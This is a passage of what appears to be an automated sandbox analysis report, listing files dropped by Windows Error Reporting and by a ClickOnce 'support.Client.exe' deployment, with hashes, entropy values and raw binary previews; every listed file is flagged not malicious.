.7.0.8.b.b.8.f.8.9.5.a.d.c.f.5.5.3.8.d.1.6.6.f.7.5.4.a.2.9.1.3.!.s.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....T.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER925F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 4 23:03:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	67254
Entropy (8bit):	1.7986069626607888
Encrypted:	false
SSDEEP:	192:0jkHWt3X/bbOEI/sd2yhumyHZtedd4ZSCMXtKbi5/KLzMQ8e7:4k2tziEI/jycmGtedd8SCktKbJX8
MD5:	C58E666013D73A757C694D1410DD3CD5
SHA1:	0AB13A822923C78330C8B54F3BD4B9324B3E1A15
SHA-256:	573F0D8F2448132748316D346CE2B17FBD572C36B1C39AFE3A8FB8E91F44D95E
SHA-512:	56A7B1B76ED91777F365E12D908805CEF603EA9FDAE236BB10C1FECD29ABB4AA04788E354D6A18DA95100BE851CE1138FFF3F13B2DBB836D25A9942B8FB16B60
Malicious:	false
Preview:	MDMP..a..... .......Jt.g............$...............8.......<...............H5..........`.......8...........T...........@ ..v...........0...........................................................................................eJ..............GenuineIntel............T........... t.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER934B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.6950056909749565
Encrypted:	false
SSDEEP:	192:R6l7wVeJCx6hz6Y9hKSU9HZgmfDtbprO89bS1sfcFmm:R6lXJc6l6YbKSU9HZgmfDtxSOfa
MD5:	7B7DC3C6C6FB69347E0C29F963C0B1EC
SHA1:	D559CE2C34CA69368EA03F707520FF99E1CED598
SHA-256:	99A84EBBDF5222FF46D16B6D2DB1A5348A0B2E6E571CEC44316E8D854E963444
SHA-512:	DFF8100CE713C52D482D6FD4A9D46CAD6535D1F8455C07699EB0B243A2D0D0F8E22B7EC846A908452FBCE9DE53546053822AB5E7803E74DEB83B993E12639649
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9379.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81514
Entropy (8bit):	3.0893870369462197
Encrypted:	false
SSDEEP:	1536:yHuDMWzbZBh55e177St4ligSQC5SgXgrdSoFyAW:yHuDMWzbZBh55e177St4ligSQSSgXgre
MD5:	2B4CD4DEA20EEE915774476B7A67BCF6
SHA1:	2AA68BA3EEA6A9A9C8AE632A414476772D5F5412
SHA-256:	BE58D9D0F57CC75B573C088B9C230F92312634C17AFCA59AA1F3167F7284589D
SHA-512:	4760B190C04CDB640DE8ADF58FEB6BA13FBCE72227B6D13C837ED9034F98B4AD9344E9D95BD9FC014AC1960E94E0556A5010CA18D7DF60A3AC66E1EAE5E85722
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER937B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4613
Entropy (8bit):	4.475051675425066
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9ZOWpW8VYVYm8M4JRLFl+q8GF6/Id:uIjfHI7jv7V1JF76/Id
MD5:	F0491B8BA44CC9C534B5FDA05251B8C0
SHA1:	06EE09BA14AC95045DF990ACC4F42CF908F29D85
SHA-256:	E6D406356224FCD6D9EB859C1460FEAA22979AA0472A5D01DAAB2F8AF74AEB11
SHA-512:	EB4BFFDBE66D0CF78DBFD43B0A48A4203CCCA730274851AC95847A89F5C34F53C3BD043708AD35AB0A62434535C3F0196C1725047AC92B9A13F9E4DC297FD9CF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="529326" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C8.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6854028014679447
Encrypted:	false
SSDEEP:	96:TiZYWqxmNB//YFY/WrHFnYEZP/BtHinI3PVl6wZxuftbiakFVMT45I9d3:2ZDJSN/NHkbiakFVMT4m9d3
MD5:	8372B05B63B741C6A29080FB2534B5B1
SHA1:	987FF535233BB452DD1ED2FA17888E5C56CBD03B
SHA-256:	45414A5CC171AC8B4C0E99709874D1FEE6BCEA469DBB1661A2E8890A5E656ED7
SHA-512:	D119DFB93FB453C8E34C99629E257315D11FEFD4BEF38B0E6DCB8592FC702A121D72A9AA5C186EEC7826B106560799DE18EA6079D792A66EA2FFDC78088BE5B4
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.524696243791968
Encrypted:	false
SSDEEP:	12:5onfZLhc5RlRtBfQBhiDstCexn2grHFQhrnl3Oa/mDHiDPgMQY8XcO0Nfl8lkQHk:5incdZQiD42YHUlOa/mDmzef86Y9
MD5:	CC79C4BEC28755DD925FFE87BE23F5D5
SHA1:	A66F705D54FAD27C2E4631BE3423D1A7BA4F658F
SHA-256:	0CA63209F3A6717F5A88796981244B6490FA948BA4C7C965CAD31E34C5D61FD1
SHA-512:	E7BFFECEDB1E12799390D6624E74694FDF26218CCCA4CEA850009907BDF755F422E8FD02702A9EEF6402B793D8F2447E1F44720D3BABD400233C37EF66FCD3B1
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20241003184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241003184215Z....20241010184215Z0....H................q.X..}...W.ec...S.o..". .....D..rs;...Z..)_....D..#b.....>..H.[.8_aB....Q....d.?..Ne.$WkP.E4...J.}....4.o(...qd...^.E..e....f..)....a.o.E kZ.(......:..n...........`....}....=.\|.L..O..{..q.z....z.7..$...n..K.2DK...K..CM..^....._+W...p/....D.X...D<.&..R.....,<....q.7...]V-....lx........$.(...s..kB..a(h.........R...+...`.......Bo..0..(.....%.x....._...f0...(NJ....bb..../.....;...M....8.>M.m..ID.......7._:..-...$...0......t......1".2..Y{....$.5b....6.k...c......}<o...\|.7.E.$~W..a(\<..x

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.462038329656643
Encrypted:	false
SSDEEP:	6:kKR9d8T/SaJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Tdm/kkPlE99SCQl2DUevat
MD5:	CC7F38C8EE20F78F72CFC943D76DB71F
SHA1:	9786D72D7B21FB7BB7D5F9B1CC791A326886A00B
SHA-256:	8601884FC581C554C1F7F5D99FF2DF2467D18AC3A90D0B1C0828992FFD8A0194
SHA-512:	E0E0387711A380FC16570954F5BCD25B49EB141DF96F613D16B26A1094E5438B6E8E8EE034C50E1E384B57E2A08F0B26BB7B8F99D89D5BDF00020A101592F4E8
Malicious:	false
Preview:	p...... .........X......(................................................b}.@... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.144086598890895
Encrypted:	false
SSDEEP:	6:kKNo9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:BDnLNkPlE99SNxAhUe/3
MD5:	51F8EC26ECB02915F07AD5A0ADC950A7
SHA1:	38E7889A3564FE11AB24D05FF1C87DCA568B6E39
SHA-256:	809534A4A3710BEBC7FA6C2BF8A50D3F0E8B6C1057E9C97337E6E9E2F775DB9D
SHA-512:	3BD20615BA5390497E0D45C170882F4724770F3F606813C88769B84EFAD3F8BF4DF60247CBD0FFC252B80AD712CDD47830465C656456405DF193EED161D6D627
Malicious:	false
Preview:	p...... ..........O.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.2220888806886414
Encrypted:	false
SSDEEP:	6:kKgUzTzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:4ltWOxSW0P3PeXJUZY
MD5:	9F05D5995FD8BEAA45ACA0495037EA27
SHA1:	52F7548304EBF6C4AD27A70FA0234B94ACF562B8
SHA-256:	BBED46EE5B0690587E0D10890798E4E0D98A2ED57EA56207F18F60A430E61711
SHA-512:	BC7E35966ADC47262340D5CEED78D9B0A052616B594D578FC18686E853D59F11C84D115603221052341A0F207197F33CDEA1E71051DAA82C02111E879D414B00
Malicious:	false
Preview:	p...... ..........F.....(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.001117300397422
Encrypted:	false
SSDEEP:	6:kKrS7l4tEtGB3d7yfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkr:u7lQPkmxMiv8sFBSfamB3rbFURMOlAkr
MD5:	3D7892D64BA77A1B9A4F97A28376176A
SHA1:	0B84B3020B632BD7FA8479FE9DAE061E436B091E
SHA-256:	8DFCC43A28168EF0E054AE56BE4963E7D4C6834BDDE33D15C140475073FB1E0F
SHA-512:	E1B4B62DC24AA40FFE768CF0C1660074DE393F7A4216748F553946214B502819943F6175B871A6B623B716BABF6026E6CD37F31DEC350360F002DFADC7393A13
Malicious:	false
Preview:	p...... ....(...>.......(................]V.......: D.....................: D... ............. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.060772882719261
Encrypted:	false
SSDEEP:	6:kKyLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:6LYS4tWOxSW0PAMsZp
MD5:	6463F1C1CE1DA78939B616A5183C2A1C
SHA1:	AFAB828C621D83DA8CCFAE27CC3B3CEFE6CF1661
SHA-256:	8D2DAE91C212B3788818A8E823B3DC1333E9C42FC04979B2D609373517AC9735
SHA-512:	1B111FDB3F9CFBB86C9A3365C8F3AE9766DC7076512822F811AC56BDFAD71A4AD24CAB17405F53E5C2AFFBC1817B7D37D8BE0C15409F4E773631E96C395F5950
Malicious:	false
Preview:	p...... ....l...E@......(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.581502327470407
Encrypted:	false
SSDEEP:	384:OlqqgzGo26tX9DkX9R/QPIBM7YKEPsiBCl9kI0ZIyN1ZKqN/:Os/126tX9DkX9R/QPI+0BPEmIII2zKqp
MD5:	2BFDEAB7479BD96120B6DD835195E46D
SHA1:	A74FD1EAEA3C4B3D72764E3B63B8B42C058B0528
SHA-256:	CA97B04D392E1C62A510879261798DF0E8242129009D0A07FF29A3E997CE6990
SHA-512:	523FC60FED2BAEE841402118BB349C72D87114F6AC1263A4CCEA831D727E6FA95F456779C29EA2293B7B3369C86D91F8499AD71B327C3342DDB62E893D16CC35
Malicious:	false
Preview:	PcmH.........Y...[..f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
